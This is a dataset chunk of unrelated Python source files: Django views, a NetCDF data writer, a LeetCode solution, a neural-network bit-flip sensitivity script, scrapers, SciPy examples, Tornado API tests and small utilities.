user.is_active:\n login(request, user)\n return redirect(\"main_area\")\n else:\n form = EmailUserCreationForm()\n return render(request, \"registration/signup.html\", {'form': form})\n\n@login_required()\ndef main_area(request):\n if request.method == 'POST':\n form = SpreadsheetForm(request.POST, request.FILES)\n if form.is_valid():\n nme = form.cleaned_data['name']\n descrip = form.cleaned_data['description']\n sheet = form.cleaned_data['file']\n # need to call raw data function on sheet\n # need to call normalized data function on sheet\n usr = request.user\n spreadsheet = Spreadsheet(name=nme, description=descrip, file=sheet, user=usr) # store raw & normal data\n spreadsheet.save()\n return HttpResponseRedirect('/results/')\n else:\n form = SpreadsheetForm()\n return render(request, \"main_area.html\", {'form': form})\n\n\n@login_required()\ndef results(request):\n return render(request, \"results.html\")\n\n@login_required()\ndef settings(request):\n return render(request, \"settings.html\")\n\n@login_required()\ndef logout(request):\n logout(request)","sub_path":"visualizer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"582610183","text":"import math\n\ndef firstFunction(name):\n letters = len(name)\n firstLetter = name[0]\n return (letters, firstLetter)\n\ndef decimalPlaces(num, dec):\n return round(num, dec)\n\nif __name__ == \"__main__\":\n # inp = input()\n # integ, strin= firstFunction(inp)\n print (decimalPlaces(21.23456, 3))\n # print (integ, \"\\t\", strin)\n print (math.ceil(1.00001))\n print (\"gdjhgdhj*jgdhjgd bjhdmbduy gjgdjgdjy\".split(\"*\"))\n # l = [1,2,3]\n # print (list(map(float, l)))\n slt = list(map(int, input().split(\" \")))\n print (slt)","sub_path":"learning/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"279993616","text":"from ios_data_transform.OceanNcFile import MCtdNcFile\nfrom ios_data_transform.OceanNcVar import OceanNcVar\nfrom ios_data_transform.utils.utils import is_in, find_geographic_area, read_geojson\nfrom datetime import datetime\nfrom pytz import timezone\n\n\ndef write_bcsop_ncfile(filename, profile_id, sopdf, status):\n '''\n use data from pandas dataframe sopdf to write the data into a netcdf file\n author: Pramod Thupaki pramod.thupaki@hakai.org\n inputs:\n filename: output file name to be created in netcdf format\n sopdf: pandas dataframe with BCSOP data\n output:\n NONE\n '''\n out = MCtdNcFile()\n # write global attributes\n out.featureType = 'timeSeries'\n out.summary = 'The dataset consists of 12 coastal stations that have been monitored for several decades, the earliest commencing in 1914. There are gaps in the daily data due to weather conditions being too dangerous for sampling'\n out.title = 'BC Lightstation data'\n out.institution = 'Institute of Ocean Sciences, 9860 West Saanich Road, Sidney, B.C., Canada'\n out.infoUrl = 'https://open.canada.ca/data/en/dataset/719955f2-bf8e-44f7-bc26-6bd623e82884'\n out.cdm_profile_variables = 'time' \n # write full original header, as json dictionary\n out.description = open('header.txt').readlines()\n # initcreate dimension variable\n out.nrec = int(len(sopdf.index))\n ncfile_var_list = []\n ncfile_var_list.append(OceanNcVar('str_id', 'country', None, None, None, 'Canada'))\n ncfile_var_list.append(OceanNcVar('str_id', 'project', None, None, None, 'British Columbia Shore station Observation Program (BCSOP)'))\n ncfile_var_list.append(OceanNcVar('str_id', 'contact_name', None, None, None, 'Peter Chandler'))\n ncfile_var_list.append(OceanNcVar('str_id', 'contact_email',None, None, None, 'peter.chandler@dfo-mpo.gc.ca'))\n ncfile_var_list.append(OceanNcVar('str_id', 'agency', None, None, None, 'Fisheries and Oceans Canada'))\n ncfile_var_list.append(OceanNcVar('str_id', 'instrument_type', None, None, None, 'Given this is a multi-decade time series the sampling instruments have changed over time. At present measurements are made with a YSI Pro30 multimeter.'))\n ncfile_var_list.append(OceanNcVar('lat', 'latitude', 'degrees_north', None, None, sopdf['latitude'].values[0]))\n ncfile_var_list.append(OceanNcVar('lon', 'longitude', 'degrees_east', None, None, sopdf['longitude'].values[0]))\n ncfile_var_list.append(OceanNcVar('profile', 'profile', None, None, None, profile_id))\n ncfile_var_list.append(OceanNcVar('str_id', 'status', None, None, None, status))\n try:\n obs_time = [datetime.strptime(d, \"%m/%d/%Y\") for d in sopdf['date'].values]\n except:\n obs_time = [datetime.strptime(d, \"%Y-%m-%d\") for d in sopdf['date'].values]\n obs_time_utc = [timezone('UTC').localize(date_obj) for date_obj in obs_time]\n ncfile_var_list.append(OceanNcVar('time', 'time', None, None, None, obs_time_utc, vardim=('time')))\n # go through channels and add each variable depending on type\n null_value = float('NaN')\n # add temperature variable \n ncfile_var_list.append(OceanNcVar('temperature', 'TEMPTC01',\n 'deg C', sopdf['temperature'].min,\n sopdf['temperature'].max, sopdf['temperature'].values, ncfile_var_list,\n ('time'), null_value, conv_to_BODC=False))\n # add salinity variable\n ncfile_var_list.append(OceanNcVar('salinity', 'PSALPR01',\n 'PSS-78', sopdf['salinity'].min,\n sopdf['salinity'].max, sopdf['salinity'].values, ncfile_var_list,\n ('time'), null_value, conv_to_BODC=False))\n # attach variables to ncfileclass and call method to write netcdf file\n out.varlist = ncfile_var_list\n out.write_ncfile(filename)\n print(\"Finished writing file:\", filename)\n return 1\n","sub_path":"projects/bc_lightstation/bcsop_utils/write_bcsop_ncfile.py","file_name":"write_bcsop_ncfile.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456350027","text":"\"\"\"\nGiven the root of a binary tree, return the average value of the nodes \non each level in the form of an array. Answers within 10-5 of the actual \nanswer will be accepted.\n\n\"\"\"\n\nfrom typing import List\nfrom typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\ndef creatBTree(data, index):\n pNode = None\n if index < len(data):\n if data[index] == None:\n return\n pNode = TreeNode(data[index])\n pNode.left = creatBTree(data, 2 * index + 1) # [1, 3, 7, 15, ...]\n pNode.right = creatBTree(data, 2 * index + 2) # [2, 5, 12, 25, ...]\n return pNode \n\nclass Solution:\n def averageOfLevels(self, root: Optional[TreeNode]) -> List[float]:\n \n sumByLevel = {}\n numberOfNodesPerLevel = {}\n\n def sumLevel(node, level):\n if node == None:\n return\n # update our counts\n sumByLevel[level] = sumByLevel.get(level,0) + node.val\n numberOfNodesPerLevel[level] = numberOfNodesPerLevel.get(level,0)+1\n\n sumLevel(node.left, level+1)\n sumLevel(node.right, level+1)\n\n sumLevel(root, 0)\n\n result = []\n for i in range(len(sumByLevel)):\n avg = sumByLevel[i] / numberOfNodesPerLevel[i]\n result.append(avg)\n\n return sumByLevel\n\n\ns = Solution()\nbtree = creatBTree([3,9,20,None,None,15,7],0)\nanswer = s.averageOfLevels(btree)\nprint(answer)\n","sub_path":"leetcode/637_avg_of_levels_in_btree/avg.py","file_name":"avg.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"357884154","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport torch\nimport argparse\nimport data\nimport util\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom models import nin\nfrom torch.autograd import Variable\nimport tqdm\nimport time\nimport numpy as np\n\ndef Dict2File(Dict, filename):\n F = open(filename, 'w+')\n F.write(str(Dict))\n F.close()\n\ndef test(i, key, shape, rand = False, randFactor = 256):\n global best_acc\n test_loss = 0\n correct = 0\n if (not rand) or (len(shape) != 4):\n model = nin.Net()\n pretrained_model = torch.load(args.pretrained)\n best_acc = pretrained_model['best_acc']\n model.load_state_dict(pretrained_model['state_dict'])\n model.to(device)\n bin_op = util.BinOp(model)\n model.eval()\n bin_op.binarization()\n state_dict = model.state_dict()\n \n\n if len(shape) == 4:\n size1 = shape[1]\n size2 = shape[2]\n size3 = shape[3]\n if rand:\n if (int(i/(size2*size3))%int(size1)) == torch.randint(0,size1-1,[1]):\n model = nin.Net()\n pretrained_model = torch.load(args.pretrained)\n model.load_state_dict(pretrained_model['state_dict'])\n model.to(device)\n bin_op = util.BinOp(model)\n model.eval()\n bin_op.binarization()\n state_dict = model.state_dict()\n (state_dict[key][int(i/size1/size2/size3)][int(i/size2/size3%size1)][int(i/size3%size2)][int(i%size3)]).mul_(-1)\n else:\n return 100\n else:\n (state_dict[key][int(i/size1/size2/size3)][int(i/size2/size3%size1)][int(i/size3%size2)][int(i%size3)]).mul_(-1)\n\n if len(shape) == 1:\n state_dict[key][i].mul_(-1)\n\n if len(shape) == 2:\n size = state_dict[key].shape[1]\n (state_dict[key][int(i/size)][i%size]).mul_(-1)\n \n with torch.no_grad():\n for data, target in testloader:\n data, target = Variable(data.to(device)), Variable(target.to(device))\n\n output = model(data)\n test_loss += criterion(output, target).data.item()\n pred = output.data.max(1, keepdim=True)[1]\n correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n bin_op.restore()\n acc = 100. * float(correct) / len(testloader.dataset)\n return acc\n\n\nif __name__=='__main__':\n # prepare the options\n parser = argparse.ArgumentParser()\n parser.add_argument('--cpu', action='store_true',\n help='set if only CPU is available')\n parser.add_argument('--data', action='store', default='./data/',\n help='dataset path')\n parser.add_argument('--arch', action='store', default='nin',\n help='the architecture for the network: nin')\n parser.add_argument('--lr', action='store', default='0.01',\n help='the intial learning rate')\n parser.add_argument('--pretrained', action='store', default='nin.best.pth.tar',\n help='the path to the pretrained model')\n parser.add_argument('--evaluate', action='store_true', default=True,\n help='evaluate the model')\n parser.add_argument('--verbose', action='store_true', default=False,\n help='display more information')\n parser.add_argument('--device', action='store', default='cuda:0',\n help='input the device you want to use')\n args = parser.parse_args()\n if args.verbose:\n print('==> Options:',args)\n \n device = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\n\n # set the seed\n torch.manual_seed(1)\n torch.cuda.manual_seed(1)\n\n # prepare the data\n if not os.path.isfile(args.data+'/train_data'):\n # check the data path\n raise Exception\\\n ('Please assign the correct data path with --data ')\n\n testset = data.dataset(root=args.data, train=False)\n testloader = torch.utils.data.DataLoader(testset, batch_size=512,\n shuffle=False, num_workers=4)\n\n # define classes\n classes = ('plane', 'car', 'bird', 'cat',\n 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n # define the model\n if args.verbose:\n print('==> building model',args.arch,'...')\n if args.arch == 'nin':\n model = nin.Net()\n else:\n raise Exception(args.arch+' is currently not supported')\n\n # initialize the model\n if not args.pretrained:\n if args.verbose:\n print('==> Initializing model parameters ...')\n best_acc = 0\n for m in model.modules():\n if isinstance(m, nn.Conv2d):\n m.weight.data.normal_(0, 0.05)\n m.bias.data.zero_()\n else:\n if args.verbose:\n print('==> Load pretrained model form', args.pretrained, '...')\n pretrained_model = torch.load(args.pretrained)\n best_acc = pretrained_model['best_acc']\n model.load_state_dict(pretrained_model['state_dict'])\n\n if not args.cpu:\n model.to(device)\n #model = torch.nn.DataParallel(model, device_ids=range(torch.cuda.device_count()))\n if args.verbose:\n print(model)\n\n # define solver and criterion\n base_lr = float(args.lr)\n param_dict = dict(model.named_parameters())\n params = []\n\n for key, value in param_dict.items():\n params += [{'params':[value], 'lr': base_lr,\n 'weight_decay':0.00001}]\n\n optimizer = optim.Adam(params, lr=0.10,weight_decay=0.00001)\n criterion = nn.CrossEntropyLoss()\n\n # define the binarization operator\n bin_op = util.BinOp(model)\n happy = model.state_dict()\n\n # do the evaluation if specified\n if args.evaluate:\n rand = False\n count = 0\n tLoss = 0\n lMax = 0\n lAvg = 0\n bestAcc = 86.28\n save = []\n\n find_key = \"13.weight\"\n print(find_key)\n state_dict = model.state_dict()\n \n for key in state_dict.keys():\n if key.find(find_key) != -1:\n total = 1\n shape = state_dict[key].shape\n use_key = key\n for t in range(len(state_dict[key].shape)):\n total *= state_dict[key].shape[t] \n \n with tqdm.tqdm(range(total)) as Loader:\n start = time.time()\n for i in Loader:\n acc = test(i, use_key, shape = shape, rand = rand)\n loss = bestAcc - acc\n \n if (acc != 100):\n count += 1\n lAvg = tLoss / float(count)\n tLoss += loss\n save.append((i,loss))\n Loader.set_description(\"Av: %.2f%%, M: %.2f%%\"%(lAvg, lMax))\n \n if (loss > lMax):\n lMax = loss\n\n end = time.time()\n if (end - start > 300):\n np.save(find_key+'_tmp',save)\n start = end\n\n np.save(find_key+'.neg', save)\n print (\"lAvg = %f%%, Max = %f%%\"%(lAvg, lMax))\n exit()\n","sub_path":"CIFAR_10/BI.py","file_name":"BI.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"356790940","text":"class Solution:\n def replaceElements(self, arr: List[int]) -> List[int]:\n max_val = -1\n output_arr = [0]*len(arr)\n output_arr[len(arr)-1]=max_val\n for i in range(len(arr)-2, -1, -1):\n if arr[i+1]>max_val:\n output_arr[i]=arr[i+1]\n max_val = arr[i+1]\n else:\n output_arr[i]=max_val \n return output_arr\n","sub_path":"LeetCode/replace-elements-with-greatest-element-on-right-side.py","file_name":"replace-elements-with-greatest-element-on-right-side.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"567832346","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef get_new_songs(url):\n # looking at HTML structure of everynoise new releases page\n home_url = url\n res = requests.get(home_url)\n soup = BeautifulSoup(res.content, 'lxml')\n\n # finding all rows with artist and song name with uris\n album_row = soup.find_all('div', attrs = {\"class\": \"albumrow\"})\n\n # creating a list of dictionaries to create a DataFrame\n tracks = []\n for i in range(len(album_row)):\n if len(album_row[i].find_all('span', attrs = {\"class\": \"trackcount\"})) == 0:\n indiv_track = [{'artist_uri': album_row[i].find_all('a')[0]['href'],\n 'artist': album_row[i].find_all('a')[0].find_all('b')[0].text,\n 'track_uri': album_row[i].find_all('span')[0]['trackid'],\n 'track_name': album_row[i].find_all('a')[1].text}]\n tracks += indiv_track\n tracks = pd.DataFrame(tracks)\n return tracks\n","sub_path":"code/everynoise/everynoise.py","file_name":"everynoise.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"620455348","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport scipy as sp\n\nfrom scipy import fftpack\nfrom scipy import interpolate\nfrom matplotlib import pyplot as plt\n\n###################################################################################\n# Résolution équation linéaire\n# A x = b\n\n## x + 2 y = 1\n## 3 x + 4 y = 2\n\nb = np.array([1, 2])\nA = np.array([[1, 2], [3, 4]])\nprint(b)\nprint(A)\n\nA_inverse = np.linalg.inv(A)\nprint(A_inverse)\n\nx = np.dot(A_inverse,b)\nprint(x)\n\n#### Méthode alternative\nx = np.linalg.solve(A, b)\nprint(x)\n\n###################################################################################\n#### Transformée de Fourier\n# fréquence d’échantillonnage en Hz\nfe = 100\n# durée en seconde\nT = 10\n# Nombre de point :\nN = T*fe\n# Array temporel :\nt = np.arange(1.,N)/fe\n# fréquence du signal : Hz\nf0 = 0.5\n# signal temporel\nsinus = np.sin(2*np.pi*f0*t)\n# ajout de bruit\nbruit = np.random.normal(0,0.5,N-1)\nsinus2 = sinus + bruit\n# signal fréquentiel : on divise par la taille du vecteur pour normaliser la fft\nfourier = fftpack.fft(sinus2)/np.size(sinus2)\n# axe fréquentiel:\naxe_f = np.arange(0.,N-1)*fe/N\n# On plot\nplt.figure()\nplt.subplot(121)\nplt.plot(t,sinus2,'-')\nplt.plot(t,sinus,'r-')\nplt.xlabel('axe temporel, en seconde')\nplt.subplot(122)\nplt.plot(axe_f,np.abs(fourier),'x-')\nplt.xlabel('axe frequentiels en Hertz')\nplt.show()\n\n###################################################################################\n###### Interpolation\n# 1ère courbe\nt = np.arange(11)\nsinus = np.sin(t)\n# création de notre sous-fonction d'interpolation quadratique\nF_sinus = interpolate.interp1d(t,sinus,kind='quadratic')\n# second axe de temps sur lequel on interpolera\nt2 = np.arange(0, 10, 0.5)\n# Interpolation\nsinus2 = F_sinus(t2)\n# Affichage:\nplt.plot(t, sinus, 'rx-') # RED\nplt.plot(t2, sinus2, 'bd-') # BLUE\nplt.show()\n\n\n","sub_path":"Python - Divers/TP - SciPy.py","file_name":"TP - SciPy.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"358232103","text":"from routes import (\n redirect,\n GuaTemplate,\n html_response,\n)\n\n\ndef index(request):\n body = GuaTemplate.render('map_editor.html')\n return html_response(body)\n\n\ndef save_map(request):\n data = 'guaMapData = `' + request.body + '`'\n path = 'C:\\\\Users\\\\ljhua\\\\GitHub\\\\gua.game.js\\\\8.18\\\\guagame\\\\gua_map_data.js'\n # print('data', data)\n with open(path, 'w+', encoding='utf-8') as f:\n # log('save', path, s, data)\n f.write(data)\n print('write success')\n return redirect('/')\n\n\ndef route_dict():\n \"\"\"\n 路由字典\n key 是路由(路由就是 path)\n value 是路由处理函数(就是响应)\n \"\"\"\n d = {\n '/': index,\n '/save': save_map,\n }\n return d\n","sub_path":"8.18/mario_python/routes_mario.py","file_name":"routes_mario.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"361032251","text":"'''\nWrite regular time-series data to example.dss\n'''\nimport numpy as np\nfrom pydsstools.heclib.dss import HecDss\nfrom pydsstools.core import TimeSeriesContainer\n\ndss_file = \"example.dss\"\n\ntsc = TimeSeriesContainer()\ntsc.granularity_value = 60 #seconds i.e. minute granularity\ntsc.numberValues = 10\ntsc.startDateTime=\"01 JAN 2017 01:00\"\ntsc.pathname = \"/REGULAR/TIMESERIES/FLOW//1HOUR/WRITE2/\"\ntsc.units = \"cfs\"\ntsc.type = \"INST\"\ntsc.interval = 1\n#must a +ve integer for regular time-series\n#actual interval implied from E part of pathname\ntsc.values =np.array(range(10),dtype=np.float32)\n#values may be list,array, numpy array\n\nfid = HecDss.Open(dss_file)\nstatus = fid.put(tsc)\nfid.close()\n","sub_path":"pydsstools/examples/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468306580","text":"from django.core.exceptions import ValidationError\nfrom django.test import TestCase\nfrom WhereIs.models import ServidorModel\n\n\nclass TestServidor(TestCase):\n def test_model(self) -> None:\n servidor = ServidorModel(ip='12.226.226.11', dominio='tre.com')\n servidor.save()\n servidor.delete()\n\n def test_ip_validation(self) -> None:\n with self.assertRaises(ValidationError):\n servidor = ServidorModel(ip='441.12.2.12')\n servidor.full_clean()\n servidor.save()\n","sub_path":"src/WhereIs/tests/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"64955292","text":"import requests\nimport json\nfrom requests_oauthlib import OAuth1\n\nterm = \"doughnut\"\n\nfor x in range(0, 22):\n auth = OAuth1(\"1d6cea836bd14236a738db46ae3a04e8\", \"d67c77d4234e4953b8b38cf07fbbb18b\")\n endpoint = \"https://api.thenounproject.com/icons/\" + term + \"?page=\" + str(x)\n response = requests.get(endpoint, auth=auth)\n\n with open('./jsons/' + term + '-p' + str(x) + '.json', 'w') as results_file:\n json.dump(response.json(), results_file)\n","sub_path":"final/collect/call-json.py","file_name":"call-json.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"27251245","text":"import threading\nimport queue\nimport re\nimport rx.subject\n\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.plotting import curdoc, figure\nfrom bokeh.layouts import column, row\nfrom bokeh.models import FactorRange, Range1d\nfrom bokeh.models import Select\n\nfrom nanomsgnode import PropellerNodeController, CHANNEL_NAMES\n\nRSSI_HISTORY = 200\n\n\nclass PropellerTimestampProcessor:\n\n CPUFREQ = 80_000_000\n\n def __init__(self):\n self._last_ts = None\n self.signal = rx.subject.Subject()\n\n def __call__(self, timestamp):\n if self._last_ts is not None:\n diff = (timestamp + 2**32 - self._last_ts) % 2**32\n self.signal.on_next(diff / self.CPUFREQ)\n self._last_ts = timestamp\n\n\nclass Visualisation:\n\n def __init__(self, node):\n self._node = node\n self._timestamp_processor = PropellerTimestampProcessor()\n self._lines_q = queue.Queue()\n\n number_of_vtx = node.configuration()[0]\n self._laptime_format = \"> 1\t#移位运算,把num转换成二进制后所有位向后移动一位,高位补0\n\t\tindexBit += 1\t#指针跟上\n\treturn indexBit\t\t#返回最右边第一个是1的位置\ndef IsBit(num, indexBit):\n\t'''\n\t用于判断在num的二进制表示中从右边起的indexBit位是否为1\n\t'''\n\tnum = num >> indexBit\n\treturn num & 1\t\t#0为False,1为True\nx = [2,4,3,6,3,2,5,5]\nprint(FindNumsAppearOnce(x))\n\n'''\n移位运算:\n\t<< n : 是整体向左移动n位\n\t>> n : 是整体向右移动n位\n'''\n","sub_path":"数据结构与算法/剑指offer/40.数组中只出现一次的数字.py","file_name":"40.数组中只出现一次的数字.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"434505888","text":"import json\nfrom pathlib import Path\n\nDIRPATH = Path(__file__).parent.resolve() / \"data\"\n\nair_molecular_weight = 28.97 # [kg/kmol], molecular weight of air\natmosphere_total_mass = 5.1352e18 # [kg] total mass of atmosphere\n\nfp_substances = DIRPATH / \"ipcc2013.json\"\nwith open(fp_substances, 'rb') as f:\n substances_data = json.load(f)","sub_path":"gwp_uncertainties/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"534960750","text":"#\r\n\r\n\r\nfrom datetime import date, datetime, timedelta\r\nfrom django.utils import formats\r\n\r\nf_date = date(2018, 2, 21)\r\nl_date = date(2018, 7, 11)\r\n\r\ndelta = l_date - f_date\r\nprint(delta.days+2)\r\n\r\nact_level = [1,1.12,1.27,1.54]\r\nb = 152*act_level[0]\r\nprint(b)\r\n#date_format = \"%m/%d/%Y\"\r\n#date_joined = datetime.now().date()\r\n#print(date_joined)\r\n#start_date = date(2018, 2, 2)\r\n#start_date.strftime('%B %d,%Y')\r\n#x = datetime.strptime(start_date, '%B %d,%Y')\r\n#print(start_date)\r\n#new_date = start_date.date()\r\n#print(new_date)\r\n#for i in range(0,32):\r\n # f_date = f_date + timedelta(days=1)\r\n # print(f_date)\r\n # if(f_date==date_joined):\r\n # print(\"found\")\r\n # break\r\n\r\n#a = date_joined[1:4]\r\n#k=date_joined.strftime('%Y/%m/%d')\r\n#a = k[0:4]\r\n#b = k[5:7]\r\n#c= k[8:10]\r\n#l_date = date(int(a), int(b), int(c))\r\n#print((f_date-l_date).days)\r\n#print(a,' ',b,' ',c)\r\n","sub_path":"myproject/myapp/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"552856764","text":"# Copyright (c) 2019. All rights reserved.\n\nimport atexit\nfrom io import StringIO\nimport json\nimport unittest\nimport yaml\n\nfrom tornado.ioloop import IOLoop\nimport tornado.testing\n\nfrom addrservice.app import (\n make_addrservice_app,\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR\n)\n\nfrom tests.unit.address_data_test import address_data_suite\n\n\nIN_MEMORY_CFG_TXT = '''\nservice:\n name: Address Book Test\n\naddr-db:\n memory: null\n\ntracing:\n addrservice.tracing.CummulativeFunctionTimeProfiler: null\n addrservice.tracing.Timeline: null\n'''\n\nwith StringIO(IN_MEMORY_CFG_TXT) as f:\n TEST_CONFIG = yaml.load(f.read(), Loader=yaml.SafeLoader)\n\n\nclass TestAddressServiceApp(tornado.testing.AsyncHTTPTestCase):\n def setUp(self) -> None:\n super().setUp()\n self.headers = {'Content-Type': 'application/json; charset=UTF-8'}\n address_data = address_data_suite()\n keys = list(address_data.keys())\n self.assertGreaterEqual(len(keys), 2)\n self.addr0 = address_data[keys[0]]\n self.addr1 = address_data[keys[1]]\n\n def get_app(self) -> tornado.web.Application:\n addr_service, app = make_addrservice_app(\n config=TEST_CONFIG,\n debug=True\n )\n\n addr_service.start()\n atexit.register(lambda: addr_service.stop())\n\n return app\n\n def get_new_ioloop(self):\n IOLoop.configure('tornado.platform.asyncio.AsyncIOLoop')\n instance = IOLoop.instance()\n return instance\n\n def test_liveness(self):\n r = self.fetch(\n '/healthz',\n method='GET',\n headers=None,\n )\n info = json.loads(r.body.decode('utf-8'))\n\n self.assertEqual(r.code, 200, info)\n self.assertGreater(info['uptime'], 0)\n\n def test_readiness(self):\n r = self.fetch(\n '/readiness',\n method='GET',\n headers=None,\n )\n info = json.loads(r.body.decode('utf-8'))\n\n self.assertEqual(r.code, 200, info)\n self.assertTrue(info['ready'])\n self.assertGreater(info['uptime'], 0)\n\n def test_default_handler(self):\n r = self.fetch(\n '/does-not-exist',\n method='GET',\n headers=None,\n )\n # info = json.loads(r.body.decode('utf-8'))\n\n # TODO: Exercise: Tornado, by default, send HTML response on 404.\n # Implement BaseRequestHandler.write_error method to return a JSON\n # response, and hook DefaultRequestHandler to tornado.web.Application\n # creation with suitable args so that the last two assert statements\n # of this test function start passing.\n info = r.body\n # print(info)\n\n self.assertEqual(r.code, 404, info)\n # self.assertEqual(info['code'], 404)\n # self.assertEqual(info['message'], 'Unknown Endpoint')\n\n # TODO: Exercise: rename this function to test_address_book_endpoints\n def test_address_book_endpoints(self):\n # Get all addresses in the address book, must be ZERO\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='GET',\n headers=None,\n )\n all_addrs = json.loads(r.body.decode('utf-8'))\n self.assertEqual(r.code, 200, all_addrs)\n self.assertEqual(len(all_addrs), 0, all_addrs)\n\n # Add an address\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='POST',\n headers=self.headers,\n body=json.dumps(self.addr0),\n )\n self.assertEqual(r.code, 201)\n addr_uri = r.headers['Location']\n\n # POST: error cases\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='POST',\n headers=self.headers,\n body='it is not json',\n )\n self.assertEqual(r.code, 400)\n self.assertEqual(r.reason, 'Invalid JSON body')\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='POST',\n headers=self.headers,\n body=json.dumps({}),\n )\n self.assertEqual(r.code, 400)\n self.assertEqual(r.reason, 'JSON Schema validation failed')\n\n # Get the added address\n r = self.fetch(\n addr_uri,\n method='GET',\n headers=None,\n )\n self.assertEqual(r.code, 200)\n self.assertEqual(self.addr0, json.loads(r.body.decode('utf-8')))\n\n # GET: error cases\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id='no-such-id'),\n method='GET',\n headers=None,\n )\n self.assertEqual(r.code, 404)\n\n # Update that address\n r = self.fetch(\n addr_uri,\n method='PUT',\n headers=self.headers,\n body=json.dumps(self.addr1),\n )\n self.assertEqual(r.code, 204)\n\n r = self.fetch(\n addr_uri,\n method='GET',\n headers=None,\n )\n self.assertEqual(r.code, 200)\n self.assertEqual(self.addr1, json.loads(r.body.decode('utf-8')))\n\n # PUT: error cases\n r = self.fetch(\n addr_uri,\n method='PUT',\n headers=self.headers,\n body='it is not json',\n )\n self.assertEqual(r.code, 400)\n self.assertEqual(r.reason, 'Invalid JSON body')\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id='1234'),\n method='PUT',\n headers=self.headers,\n body=json.dumps(self.addr1),\n )\n self.assertEqual(r.code, 404)\n r = self.fetch(\n addr_uri,\n method='PUT',\n headers=self.headers,\n body=json.dumps({}),\n )\n self.assertEqual(r.code, 400)\n self.assertEqual(r.reason, 'JSON Schema validation failed')\n\n # Delete that address\n r = self.fetch(\n addr_uri,\n method='DELETE',\n headers=None,\n )\n self.assertEqual(r.code, 204)\n r = self.fetch(\n addr_uri,\n method='GET',\n headers=None,\n )\n self.assertEqual(r.code, 404)\n\n # DELETE: error cases\n r = self.fetch(\n addr_uri,\n method='DELETE',\n headers=None,\n )\n self.assertEqual(r.code, 404)\n\n # Get all addresses in the address book, must be ZERO\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='GET',\n headers=None,\n )\n all_addrs = json.loads(r.body.decode('utf-8'))\n self.assertEqual(r.code, 200, all_addrs)\n self.assertEqual(len(all_addrs), 0, all_addrs)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/integration/app_test.py","file_name":"app_test.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"521166745","text":"from availability import get_availability\n# from store import get_bj_stores_number\nfrom store import get_sz_stores_number\n\n\ndef check_availability(checkStores, strWantedModel):\n avai = get_availability()\n yoho = []\n res = {}\n for store_num, store_name in checkStores:\n model_avai = avai['stores'][store_num][strWantedModel]['availability']\n res[store_name] = model_avai\n if model_avai['contract'] or model_avai['unlocked']:\n yoho.append(store_name)\n print('有货:store_num[%s] store_name[%s] model[%s]' % (store_num, store_name, model_avai))\n return res, yoho\n\n\nif __name__ == '__main__':\n check_stores = get_sz_stores_number()\n res, yoho = check_availability(check_stores,'MGLD3CH/A')\n print(res)\n 